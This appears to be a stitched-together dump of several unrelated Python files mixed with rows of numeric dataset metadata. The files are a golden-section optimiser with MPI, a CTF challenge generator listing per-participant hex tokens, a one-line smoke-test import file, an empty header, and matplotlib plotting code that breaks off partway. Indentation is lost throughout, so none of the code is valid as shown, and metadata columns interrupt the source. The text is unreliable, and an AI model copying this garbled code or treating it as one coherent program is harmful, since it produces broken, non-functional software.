D = np.round(D, taudecimal)
if B in cache:
score_B = cache[B]
else:
score_B = function(x, B)
cache[B] = score_B
if D in cache:
score_D = cache[D]
else:
score_D = function(x, D)
cache[D] = score_D
if mpi:
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
if rank == 0:
if score_B <= score_D:
opt_score = score_B
opt_tau = B
C = D
D = B
B = A + delta * np.abs(C - A)
else:
opt_score = score_D
opt_tau = D
A = B
B = D
D = C - delta * np.abs(C - A)
diff = score_B - score_D
opt_tau = np.round(opt_tau, taudecimal)
B = comm.bcast(B, root=0)
D = comm.bcast(D, root=0)
diff = comm.bcast(diff, root=0)
opt_score = comm.bcast(opt_score, root=0)
opt_tau = comm.bcast(opt_tau, root=0)
else:
if score_B <= score_D:
opt_score = score_B
opt_tau = B
C = D
D = B
B = A + delta * np.abs(C - A)
else:
opt_score = score_D
opt_tau = D
A = B
B = D
D = C - delta * np.abs(C - A)
diff = score_B - score_D
return opt_tau, opt_score
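# Note on the MPI branch above: only rank 0 updates the search bracket, then
# B, D, diff, opt_score and opt_tau are broadcast from rank 0 so all ranks stay in sync.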
def twostep_golden_section(a, c, A, C, delta, function,
tol, max_iter, bwdecimal, taudecimal, verbose = False, mpi = False):
b = a + delta * np.abs(c - a)
d = c - delta * np.abs(c - a)
opt_score = None
opt_bw = None
opt_tau = None
diff = 1e9
cache = {}
iters = 0
while np.abs(diff) > tol and iters < 200:
iters += 1
b = np.round(b, bwdecimal)
d = np.round(d, bwdecimal)
if b in cache:
score_b = cache[b]
else:
if mpi:
tau_b, score_b = onestep_golden_section(A, C, b, delta, taudecimal, function,
tol, mpi=True)
else:
tau_b, score_b = onestep_golden_section(A, C, b, delta, taudecimal, function,
tol)
cache[b] = score_b
if d in cache:
score_d = cache[d]
else:
if mpi:
tau_d, score_d = onestep_golden_section(A, C, d, delta, taudecimal, function,
tol, mpi=True)
else:
tau_d, score_d = onestep_golden_section(A, C, d, delta, taudecimal, function,
tol)
cache[d] = score_d
if mpi:
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
if rank == 0:
if score_b <= score_d:
opt_score = score_b
opt_bw = b
opt_tau = tau_b
c = d
d = b
b = a + delta * np.abs(c - a)
else:
opt_score = score_d
opt_bw = d
opt_tau = tau_d
a = b
b = d
d = c - delta * np.abs(c - a)
diff = score_b - score_d
opt_tau = np.round(opt_tau, taudecimal)
opt_bw = np.round(opt_bw, bwdecimal)
if verbose:
print('bw: ', opt_bw, ', tau: ', opt_tau, ', score: ', opt_score)
b = comm.bcast(b, root=0)
d = comm.bcast(d, root=0)
diff = comm.bcast(diff, root=0)
opt_bw = comm.bcast(opt_bw, root=0)
opt_tau = comm.bcast(opt_tau, root=0)
else:
if score_b <= score_d:
opt_score = score_b
opt_bw = b
opt_tau = tau_b
c = d
d = b
b = a + delta * np.abs(c - a)
else:
opt_score = score_d
opt_bw = d
opt_tau = tau_d
a = b
b = d
d = c - delta * np.abs(c - a)
diff = score_b - score_d
if verbose:
print('bw: ', opt_bw, ', tau: ', opt_tau, ', score: ', opt_score)
return opt_bw, opt_tau
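A minimal usage sketch for golden_section, assuming a simple convex score function; the interval, tolerance, and delta below are illustrative (delta of about 0.382 gives the classic golden-section split).
# --- Hypothetical usage sketch (not part of the source file) ---
import numpy as np
score = lambda bw: (bw - 3.7) ** 2 + 1.0  # toy convex objective
best_bw = golden_section(a=0.0, c=10.0, delta=0.38197, decimal=2,
                         function=score, tol=1.0e-6, max_iter=200, verbose=True)
# best_bw converges to roughly 3.7 (rounded to 2 decimals)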
| 32.533333
| 95
| 0.39896
| 777
| 6,344
| 3.082368
| 0.074646
| 0.065136
| 0.066806
| 0.073486
| 0.769102
| 0.747808
| 0.729019
| 0.71858
| 0.705219
| 0.695198
| 0
| 0.010971
| 0.511507
| 6,344
| 194
| 96
| 32.701031
| 0.761859
| 0
| 0
| 0.790055
| 0
| 0
| 0.008293
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016575
| false
| 0
| 0.016575
| 0
| 0.049724
| 0.016575
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37e231b093493c4fcf3a8273742eca4ee8550871
| 7,534
|
py
|
Python
|
tasks-deploy/terminal/generate.py
|
irdkwmnsb/lkshl-ctf
|
e5c0200ddc8ba73df5f321b87b9763fb1bbaba57
|
[
"MIT"
] | 3
|
2021-03-30T06:27:58.000Z
|
2021-04-03T17:56:35.000Z
|
tasks-deploy/terminal/generate.py
|
irdkwmnsb/lkshl-ctf
|
e5c0200ddc8ba73df5f321b87b9763fb1bbaba57
|
[
"MIT"
] | null | null | null |
tasks-deploy/terminal/generate.py
|
irdkwmnsb/lkshl-ctf
|
e5c0200ddc8ba73df5f321b87b9763fb1bbaba57
|
[
"MIT"
] | null | null | null |
TITLE = "Some Quick Luck"
STATEMENT_TEMPLATE = '''
[terminal.ctf.sicamp.ru:8080/{0}](http://terminal.ctf.sicamp.ru:8080/{0}/)
'''
def generate(context):
participant = context['participant']
token = tokens[participant.id % len(tokens)]
return TaskStatement(TITLE, STATEMENT_TEMPLATE.format(token))
tokens = ['baffdd47720d5684fefb2aa6b3cf1326', 'a0327b5205a9ad077381ec912484ce38', 'f8021544877c601b4543adb2af5f7632', '5071a20f8dd3313e8a173ac310b81cc2', '9e99cd5bddf71f86c31eb384fc9415d1', 'c2fe1c7aa456af6647de3b395c3ad0c6', 'be5428d0435d64dacc560d8418de2fc3', '4a6291ae8871efb68579ac3278ff2f19', '8d42865c75a7fc5e074221366f100016', '428ab21b6382a8ac55a027313f88a68a', 'bcdfe9abc540282b02b5b88278b170ca', '996e2a36402e82eccf8ceb25580445c7', 'e1a6a9dae9bf5317d820341d87e5dd64', 'ff7d2289281443f98ac516453618feb3', 'faa604f41c51f8728ba84509e90ad06a', '2c55d85df4abe0b0ad61120f1323400c', '69038113187c6a8cdc07a723fbd1c3ff', 'e1d2a2de11d9f8e8dba175ddc798d273', '7903ae5a157eea5c13cf65a366968499', '3e6d9a53d043c701df1027e033a04aa0', 'e39485ed9d72fad851688647989066ee', '273c157d1d5db1382a5282396f576a27', '446c30d4eab3971a03e3c57128a98984', '3295132b5626030dda11f9c0f85cc5e6', '92057c40fd462c433ce46c215bb09ffc', 'ece59bba53735657d32196840db03472', '5f5a1c7cf2839f016e4d91e406173c1b', 'b773c42700a60e0fb718ac58ef72c685', 'c8ef859be7ee5c4a2524915b850ca225', 'a5c4d8593d4db8cb360ac43dc2c6b22c', '7c54cde4865a12cd8ea12380173dd9a5', '7617822ad24f2ef78fb83f9714d88e83', '9e301561c62fe30d24207f16cca28397', 'e308eda818ab76216f4d97b1387bcb38', 'b30a2cbdedd6f697641fb54ebf966967', '6a14c38ee70ce6a48a9b33fd237aee92', '2e882483ff8f43e9ba529f1ecdb5b11c', '50a620836981f4efac2a2d802168fd37', '3210fb2c56dfa567c58b1cb292b2dfd9', '31b61fe2b5cf91717d2ffd64440ce87b', 'c554e42326dac06fb6290350d49b35c1', '426b2f69dcd9c757881e3b14b95d14fb', '6da453817fa270c2c52fa5c91caf036b', '0ce77a4c688a77f73d0583a2b9c5ae58', 'a56445df1f6bcea252cd38d1cfb9df8a', 'cb19e28f12a757a04cef9b79f77e62fc', 'ad5bd1884e010ccfcad401cc2ac0bbd0', 'ecb4404a7e81e170d2947e48a0d1dac6', '64ca7417de853404e3edb7e2a0d6e3e6', 'b7047cffd9d4b57f26b3c590f9e1591e', '7f094ddf937cf7200242a3e02e515b77', '602bb515dff01ced3db02ae81e9b8f4c', 'd7a53d377700d60bfd3b186f64a33029', '0f48e475f5bfae4e0a7d46e5d870ad6b', '6c90f164a23cf772c5ba126ab641df59', '57373cd09dffff77c41b3304c8bcdeeb', 'f38f91aad8d3782ac1cd3cc936958078', '835c51dc50f279f4cbc162e4eaa50055', 'dfd7c7175aa10e4a92494a244cf62c94', '1c3629e1c5e0b65b0b729f921206d8a8', '1a4588560b336156b3ea61e6525a474f', '035aff657699eba910cf4b8e06a7e48f', '8d98e90bc9ca1b34d170643190d44060', '3a81b137461e53c686b2ed1e1d9ddf7f', 'f0164113f4c208a16bc0633b973d3a58', 'd12451de753755281ed5c9de73d6fb94', '7000622182a2414f275d659ed335afc2', 'fd88478685fd893dba1cf18343b76062', '89ff927f4f80603af6369602e403fa96', '57cc687df32c43db021483e746e8a5f4', '7a1cfde5549f34d772a6e1a1f05ab744', '72df71e7409f4726a6c710c5e8ce6cee', 'a8f22fd2c85b14f4fffad01d82f84804', '93a577464fef85b7313fffa726bc4234', '8b6b82d275b3e25f97449a6148082c68', 'e2170a0da1b3543a8413549364dd59c9', '129d9c9b48dc31bacdf8233d32de5190', '7aac34db6846453deaf7ac0274e386dc', '089a7aa265342353e39de52c1bb39a87', '3c2602d4f964a82b6b457cf2c08f82b3', '676c234d201733dd6801b9a6d615e9f2', '82a6516bb549a67f0eeb740e7ac0093e', '13b50baed6e4a915878c8a8a78fed466', 'd70901ea09b3fe83e0ede8b02b9799a5', 'ed4ede85a5f9c0fa0e985e260921c785', '276db9760f6362cacb7ce80f8486a8d2', '4919b46fc17ef6e25c9309320c2b3cb9', 'bb24fff09eb18e7ef2058e50e52f9d8f', '8b56fde1bc494d7c4dfd0a88369291a5', '15efbf802975dfa3d5ef2efed7f00dfd', 'af4735a02ed259e9e4c37ac566b92329', '3d574c2e8121a15adf48fe122be01ab2', '601a55f9206313e1a50003df2a166bef', 'dbe1d2783d0d0c2bd391ccc99d9b16ca', '5e41b8ffcd034bba01fdf6a54cb9ce09', '239b7a23fbe707fb8f3b0f9015f2b42b', 'bb6f97467771a5a2a6e23960736b8b45', '5f492792297b5f22bd02c8efda266e82', 
'86e77d7e1bbe7533c8869c125bc94b25', '518783e8f56cd2cb48509e57944f92a8', '7d4a026bfa0f2655a20a8dd8f687c564', 'f65e02c5af0f2bdeb09a8e67c214dd23', '9d2e0edc4271576268bc2f35278e5462', '1fc74fe4618dd136579d971a00482964', '7c00833676623d389e6b8711a20215b3', 'a236bac2dc917f8c139182da1fc15ff2', '40c0261400bee7f1f8f2fc8945a0b9a1', 'dd9ec2d59432820f3696804aeaf60db0', 'bd93a22a51016f53ec4e9ec15a804f80', 'c6c53edb8e9c264d238abda4e8894237', 'a1d9256d441aad17e78315c4fe847afb', 'c23974a3a764130b0fc01267fd622427', '0c00ca560df9dd36f60d0d53a8cd0ed2', '0b24fc1326fe110ea5c4cc0297b3693e', 'f7eca43b1947d1eabcd8d7ca1acbe252', '0b893eeec29f2f594d32d031795348f2', '7c7b6f5f76486e8ca84f35157c6923fa', '69b2926a0938cedc74a8349cc43ddac3', '5fccb30021eac64a6ffe4fce2c970d1f', 'b96f6fce7295ffb25a16e39646a14e6f', 'e7db82a9ecbdf08ebee98ad380b68985', 'f7f8e0b447f5c78304604cc26d5b4d74', 'b41c625e555c62202e9de4170bb266a0', '8fd520bd0396365307df2f6e240f9222', '1f827c1d11bcf4aa404f6d429f6684c5', 'c1dd8896cc06463f08ca3dfe936dfdac', '6b1abf22f7df58d6ae3bd0cf8ee4c220', 'f9d0fd3517b49c9ba1f5748acca92c4a', '74e9ebe63823385c4ff285a7e9ef2729', '90cf11f42214f99bacc8208a002fe0be', '719043cc38d8678acff4e8b130e22154', '26cabdeb62a35dbd26f905bd557e9519', 'ddc1de90a1741c66ade7f7d3e3b8e0c5', '1784f57f82bb4e578eff7d95cb646af0', '0a6d323e41a17562c302f0647ceb4449', '6a612c9ef2a9363e98c9b5b3428d67ee', '44a3c63c88c79de6d1de5b7d51a967c3', '6441032ed8a683f297db3bd9ad8cb913', '643dc71b6317b96fa3daf40073cce3c2', '0502d6bf30b06aef8026356ae61be062', '1ad88a90155c043f81c38144556b8a57', '807c98a1b36ce3311a9c086fba5e89a5', '4a95ca81fef2744a03c0bc05c970b127', '56adffb6143d93611f1a5f0832d5819a', '31be4cd24daaa14eac77be92db296d45', 'a5cecc426b85ad6422ab5c0d9c16837a', '8a75943815f287d8253d4eefaacd6143', '15dd9485b0d07a67fc5492ab152f2734', 'd0dfbe6f96673d708876427358534cad', 'ff9e0613f2ec9a266f3dff2bc027a858', '08b2afe636e8b1735f790788202707eb', '1c1137447ac63690a1005df042d5f04d', '46e25d599bee1f8cbb63ee7f571584fd', '95df03cbad7fe697432c19798d05342c', '00a8097e36bd0eed89977874d704e923', '958cca5f04dea514b5baa85756e05a33', 'b07c19a9208b148746c6804b97883371', '781017f382ea9092d57baf8356c2abe6', '7900e6ec79324b23f70ac4bcbd7149a7', '36b8c6784c87ecabd6f0f9c45ffe60f9', '42e9f8b332dd6581c1543f43789103dd', 'fb549c8ad2bebb1bf6456cb2a4704983', 'ac27c26722030632efe92e7d8ceb172d', '41231f617965d65472372306d1443857', 'c8cd22abb9d2bea2ac73bc268519144f', '15c9827d108094732e01e3f6b219fc74', '3ac685725abd3e6201629eb0bebf6955', '2aa6362c4b2aac0c34a55064403db6fd', '48aca1946ceede6872f622a5854325f5', '4d1f6c38893d1fd6cc645a44afb9417e', '3071ac54004077eb2421d5147455dd6d', 'fe9191e85c8c1850d11d29197d7e9ecd', 'b70dcfbfc6ddf2bb77e35f05b1c237eb', '7dc1b362312ab3f8cb043e63381aa520', '8eb2d6c4550911effebc8cda9a6916ce', 'f31ac2d8138ea91990638c9c98a87985', '7b2fbc0398627e245ac104559d7ca6d1', '28f25eb10e93297ca069a4f3d75fc3f4', '8c7bdb7ea868e886acd2cb18771dc44a', '8904d631503545a2a4a0841501789cdf', '3a976ef2ea88a03d8c09dcf9cb73eea8', 'bb773ce4165cefe54665d7465e6f8e07', '98d827daa011f8c075410b08f1c4b91a', '55563c44328d8fa5d865a71e529692fd', '78447efa695cabcbe010c729562f7020', '4dd9ddbcec3b91678fc2d7ea31f70dcd', 'c99380de7267f1aa4296d078a5bbd83a', '80d0209bd967e6e4fb8df7f0f564fee7', 'a2df8b84c080459e560f9a2b39c4d24b', '5d04d0adf7769f237d2e9141ca778aa9', '72e8201b786b515e35bb8902d705b469', '18f48fbf8f3f97a40a130e4d5c5b5c33', '6d87559bec0ea1ccd42a9f465e5bf351', 'dfd2af177b7b71e9e12b8a7e4d20ffa9', '20ba31b40c3c2ed208139b042e080060', 'a2d037fd46eeb7841384b26011cd9be2', 
'40839122ce97eda06c7544e108cecdc5', '1107fbc2481b53a404f9ff1029a68fe0', '53991dcfaa8ef818c003a8a261d91225', 'aca209778dce1125a9c00c93c6b95244']
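# The modulo in generate() makes token assignment deterministic and wrap-around safe:
# for a hypothetical participant.id of len(tokens) + 5, the index
# (len(tokens) + 5) % len(tokens) is simply 5, so no assumption about the id range is needed.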
| 684.909091
| 7,209
| 0.879612
| 239
| 7,534
| 27.719665
| 0.937238
| 0.005132
| 0.005132
| 0.005736
| 0.007245
| 0.007245
| 0
| 0
| 0
| 0
| 0
| 0.55287
| 0.033448
| 7,534
| 11
| 7,209
| 684.909091
| 0.356907
| 0
| 0
| 0
| 1
| 0.111111
| 0.864053
| 0.850498
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0
| 0
| 0.222222
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
37fdb6e5afe9fb9ad8c7f5f474e120e4d1cd34c6
| 124
|
py
|
Python
|
downtime/tests/test_smoke.py
|
dstegelman/django-downtime
|
1be22357ab6530be24d68995b7360b1ab8c428a3
|
[
"MIT"
] | 19
|
2015-03-25T07:55:42.000Z
|
2017-08-04T01:03:48.000Z
|
downtime/tests/test_smoke.py
|
dstegelman/django-downtime
|
1be22357ab6530be24d68995b7360b1ab8c428a3
|
[
"MIT"
] | 32
|
2015-01-10T02:54:38.000Z
|
2018-02-21T03:45:30.000Z
|
downtime/tests/test_smoke.py
|
psu-oit/django-downtime
|
1be22357ab6530be24d68995b7360b1ab8c428a3
|
[
"MIT"
] | 9
|
2015-03-02T00:24:09.000Z
|
2018-11-21T17:39:17.000Z
|
from downtime.admin import *
from downtime.managers import *
from downtime.models import *
from downtime.middleware import *
| 31
| 33
| 0.814516
| 16
| 124
| 6.3125
| 0.4375
| 0.475248
| 0.534653
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.120968
| 124
| 4
| 33
| 31
| 0.926606
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
530348bea1523ebdd5f949441fcb3c4b95d7376f
| 107
|
py
|
Python
|
pgsyn/knowledge/__init__.py
|
Y1fanHE/kdps
|
c09810afb35d93018b9a7d7edb182e2f8f8a6049
|
[
"MIT"
] | null | null | null |
pgsyn/knowledge/__init__.py
|
Y1fanHE/kdps
|
c09810afb35d93018b9a7d7edb182e2f8f8a6049
|
[
"MIT"
] | null | null | null |
pgsyn/knowledge/__init__.py
|
Y1fanHE/kdps
|
c09810afb35d93018b9a7d7edb182e2f8f8a6049
|
[
"MIT"
] | null | null | null |
'''
Author: He,Yifan
Date: 2022-02-17 17:19:33
LastEditors: He,Yifan
LastEditTime: 2022-02-17 17:19:33
'''
| 15.285714
| 33
| 0.700935
| 20
| 107
| 3.75
| 0.55
| 0.186667
| 0.213333
| 0.266667
| 0.373333
| 0.373333
| 0
| 0
| 0
| 0
| 0
| 0.294737
| 0.11215
| 107
| 6
| 34
| 17.833333
| 0.494737
| 0.915888
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
530829a8730fe857d3775a366a93a63aa6596cff
| 21,897
|
py
|
Python
|
v0/aia_eis_v0/utils/visualize_utils/shareX_2Y_plots.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | 1
|
2022-03-02T12:57:19.000Z
|
2022-03-02T12:57:19.000Z
|
v0/aia_eis_v0/utils/visualize_utils/shareX_2Y_plots.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | null | null | null |
v0/aia_eis_v0/utils/visualize_utils/shareX_2Y_plots.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
"""
Module Function
    Two stacked plots share one X axis, each with its own Y axis on the same side
Refer:
Creating adjacent subplots
https://matplotlib.org/gallery/subplots_axes_and_figures/ganged_plots.html#sphx-glr-gallery-subplots-axes-and-figures-ganged-plots-py
"""
def tutorial_plot():
t = np.arange(0.0, 2.0, 0.01)
s1 = np.sin(2 * np.pi * t)
s2 = np.exp(-t)
s3 = s1 * s2
fig, axs = plt.subplots(3, 1, sharex=True)
# Remove horizontal space between axes
fig.subplots_adjust(hspace=0)
# Plot each graph, and manually set the y tick values
axs[0].plot(t, s1)
axs[0].set_yticks(np.arange(-0.9, 1.0, 0.4))
axs[0].set_ylim(-1, 1)
axs[1].plot(t, s2)
axs[1].set_yticks(np.arange(0.1, 1.0, 0.2))
axs[1].set_ylim(0, 1)
axs[2].plot(t, s3)
axs[2].set_yticks(np.arange(-0.9, 1.0, 0.4))
axs[2].set_ylim(-1, 1)
plt.show()
# tutorial_plot()
def my_shareX_2Y_plot_4_AB_0(x_arr, y1_arr, y2_arr):
"""
Function
        Plot the AB results
    :param
        x_arr: x-axis values (EIS point order)
        y1_arr: per-point average of Abs(Weights)
        y2_arr: per-point variance of Abs(Weights)
:return:
"""
    # Per-zone means of the Avg curve over the high/middle/low-frequency thirds
    avg_avg_high = np.mean(y1_arr[:int(y1_arr.shape[0] / 3)])
    avg_avg_mid = np.mean(y1_arr[int(y1_arr.shape[0] / 3) : int(2 * y1_arr.shape[0] / 3)])
    avg_avg_low = np.mean(y1_arr[int(2 * y1_arr.shape[0] / 3) : ])
    # Per-zone means of the Var curve over the high/middle/low-frequency thirds
    avg_var_high = np.mean(y2_arr[:int(y2_arr.shape[0] / 3)])
    avg_var_mid = np.mean(y2_arr[int(y2_arr.shape[0] / 3) : int(2 * y2_arr.shape[0] / 3)])
    avg_var_low = np.mean(y2_arr[int(2 * y2_arr.shape[0] / 3) : ])
    # A 3D surface plot is roughly 4:3; scaled up 3x here to 12:9
    fig, axs = plt.subplots(2, 1, figsize=(12, 9), sharex=True)
    # Tick-label font size on both axes
    # plt.tick_params(labelsize=30)
    # Remove horizontal space between axes
    fig.subplots_adjust(hspace=0)
    # Axis label/title text and the corresponding font format
x_y_title_font_setting = {'family': 'Times New Roman',
'weight': 'normal',
'size': 18}
# Plot each graph, and manually set the y tick values
axs[0].plot(x_arr, y1_arr)
y1_min, y1_max = np.min(y1_arr), np.max(y1_arr)
    # The commented variant hugs the y-limits, and its ticks carry four decimal places (too many; two suffice)
# axs[0].set_yticks(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4))
# axs[0].set_ylim(y1_min, y1_max)
axs[0].set_yticks(np.around(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4), decimals=2))
axs[0].set_ylim(y1_min-0.01, y1_max+0.01)
# axs[0].set_xlabel('distance (m)')
axs[0].set_ylabel('Average of Abs(Weights)', fontdict=x_y_title_font_setting)
    # Adjust the (x) and y tick-label fonts in the upper plot
    labels = axs[0].get_yticklabels()
    [label.set_fontname('Times New Roman') for label in labels]
    # Add text via plt.text and set its font color: https://blog.csdn.net/m0_38139098/article/details/104739475
# axs[0].text(25, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
# axs[0].text(75, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
# axs[0].text(125, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
axs[0].text(10, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
axs[0].text(65, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
axs[0].text(120, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
    axs[0].axvline(53, linestyle='--', color='red')  # red dashed line
    axs[0].axvline(106, linestyle='--', color='red')  # red dashed line
    # Horizontal lines marking the per-zone means of the Avg curve
axs[0].plot(np.arange(53), np.ones(53)*avg_avg_high, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(53, 106), np.ones(53)*avg_avg_mid, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(106, 160), np.ones(54)*avg_avg_low, linestyle='-.', color='green', linewidth=3)
    # Tick-label font size in the upper plot
axs[0].tick_params(labelsize=14)
axs[1].plot(x_arr, y2_arr)
y2_min, y2_max = np.min(y2_arr), np.max(y2_arr)
    # The commented variant hugs the y-limits, and its ticks carry four decimal places (too many; two suffice)
# axs[1].set_yticks(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4))
# axs[1].set_ylim(y2_min, y2_max)
axs[1].set_yticks(np.around(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4), decimals=2))
axs[1].set_ylim(y2_min-0.01, y2_max+0.01)
axs[1].set_ylabel('Variance of Abs(Weights)', fontdict=x_y_title_font_setting)
axs[1].set_xlabel('EIS Points Order', fontdict=x_y_title_font_setting)
# axs[1].text(25, 0.9*(y2_max-y2_min)+y2_min, 'Low', size=18, family = "Times New Roman")
# axs[1].text(75, 0.9*(y2_max-y2_min)+y2_min, 'Middle', size=18, family = "Times New Roman")
# axs[1].text(125, 0.9*(y2_max-y2_min)+y2_min, 'High', size=18, family = "Times New Roman")
    axs[1].axvline(53, linestyle='--', color='red')  # red dashed line
    axs[1].axvline(106, linestyle='--', color='red')  # red dashed line
    # Horizontal lines marking the per-zone means of the Var curve
axs[1].plot(np.arange(53), np.ones(53)*avg_var_high, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(53, 106), np.ones(53)*avg_var_mid, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(106, 160), np.ones(54)*avg_var_low, linestyle='-.', color='green', linewidth=3)
    # Tick-label font size in the lower plot
    axs[1].tick_params(labelsize=14)
    # Adjust the (x) and y tick-label fonts in the lower plot
    labels = axs[1].get_xticklabels() + axs[1].get_yticklabels()
    [label.set_fontname('Times New Roman') for label in labels]
plt.show()
def my_shareX_2Y_plot_4_AB_1(x_arr, y1_arr, y2_arr):
"""
Function
        Plot the AB results
    :param
        x_arr: x-axis values (EIS point order)
        y1_arr: per-point average of Abs(Weights)
        y2_arr: per-point variance of Abs(Weights)
:return:
"""
    # Per-zone means of the Avg curve over the high/middle/low-frequency thirds
    avg_avg_high = np.mean(y1_arr[:int(y1_arr.shape[0] / 3)])
    avg_avg_mid = np.mean(y1_arr[int(y1_arr.shape[0] / 3) : int(2 * y1_arr.shape[0] / 3)])
    avg_avg_low = np.mean(y1_arr[int(2 * y1_arr.shape[0] / 3) : ])
    # Per-zone means of the Var curve over the high/middle/low-frequency thirds
    avg_var_high = np.mean(y2_arr[:int(y2_arr.shape[0] / 3)])
    avg_var_mid = np.mean(y2_arr[int(y2_arr.shape[0] / 3) : int(2 * y2_arr.shape[0] / 3)])
    avg_var_low = np.mean(y2_arr[int(2 * y2_arr.shape[0] / 3) : ])
    # A 3D surface plot is roughly 4:3; scaled up 3x here to 12:9
    fig, axs = plt.subplots(2, 1, figsize=(12, 9), sharex=True)
    # Tick-label font size on both axes
    # plt.tick_params(labelsize=30)
    # Remove horizontal space between axes
    fig.subplots_adjust(hspace=0)
    # Axis label/title text and the corresponding font format
# x_y_title_font_setting = {'family': 'Times New Roman',
# 'weight': 'normal',
# 'size': 18}
x_y_title_font_setting_0 = {'family': 'Times New Roman',
'weight': 'bold',
'size': 18}
# Plot each graph, and manually set the y tick values
axs[0].plot(x_arr, y1_arr)
y1_min, y1_max = np.min(y1_arr), np.max(y1_arr)
    # The commented variant hugs the y-limits, and its ticks carry four decimal places (too many; two suffice)
# axs[0].set_yticks(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4))
# axs[0].set_ylim(y1_min, y1_max)
axs[0].set_yticks(np.around(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4), decimals=2))
axs[0].set_ylim(y1_min-0.01, y1_max+0.01)
    # matplotlib: drawing an overline above a letter
# python da
# axs[0].set_xlabel('distance (m)')
# axs[0].set_ylabel('Average of Abs(Weights)', fontdict=x_y_title_font_setting_0)
# axs[0].set_ylabel('|'+r"$\overline{w}$"+'|', fontdict=x_y_title_font_setting_0)
    # Adjust the (x) and y tick-label fonts in the upper plot
    labels = axs[0].get_yticklabels()
    [label.set_fontname('Times New Roman') for label in labels]
    # Add text via plt.text and set its font color: https://blog.csdn.net/m0_38139098/article/details/104739475
# axs[0].text(25, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
# axs[0].text(75, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
# axs[0].text(125, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
# axs[0].text(10, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
# axs[0].text(65, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
# axs[0].text(120, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
# axs[0].text(10, 0.9*(y1_max-y1_min)+y1_min, 'High', size=18, family = "Times New Roman")
# axs[0].text(65, 0.9*(y1_max-y1_min)+y1_min, 'Middle', size=18, family = "Times New Roman")
# axs[0].text(120, 0.9*(y1_max-y1_min)+y1_min, 'Low', size=18, family = "Times New Roman")
    axs[0].axvline(53, linestyle='--', color='red')  # red dashed line
    axs[0].axvline(106, linestyle='--', color='red')  # red dashed line
    # Horizontal lines marking the per-zone means of the Avg curve
axs[0].plot(np.arange(53), np.ones(53)*avg_avg_high, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(53, 106), np.ones(53)*avg_avg_mid, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(106, 160), np.ones(54)*avg_avg_low, linestyle='-.', color='green', linewidth=3)
    # Tick-label font size in the upper plot
axs[0].tick_params(labelsize=14)
axs[1].plot(x_arr, y2_arr)
y2_min, y2_max = np.min(y2_arr), np.max(y2_arr)
    # The commented variant hugs the y-limits, and its ticks carry four decimal places (too many; two suffice)
# axs[1].set_yticks(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4))
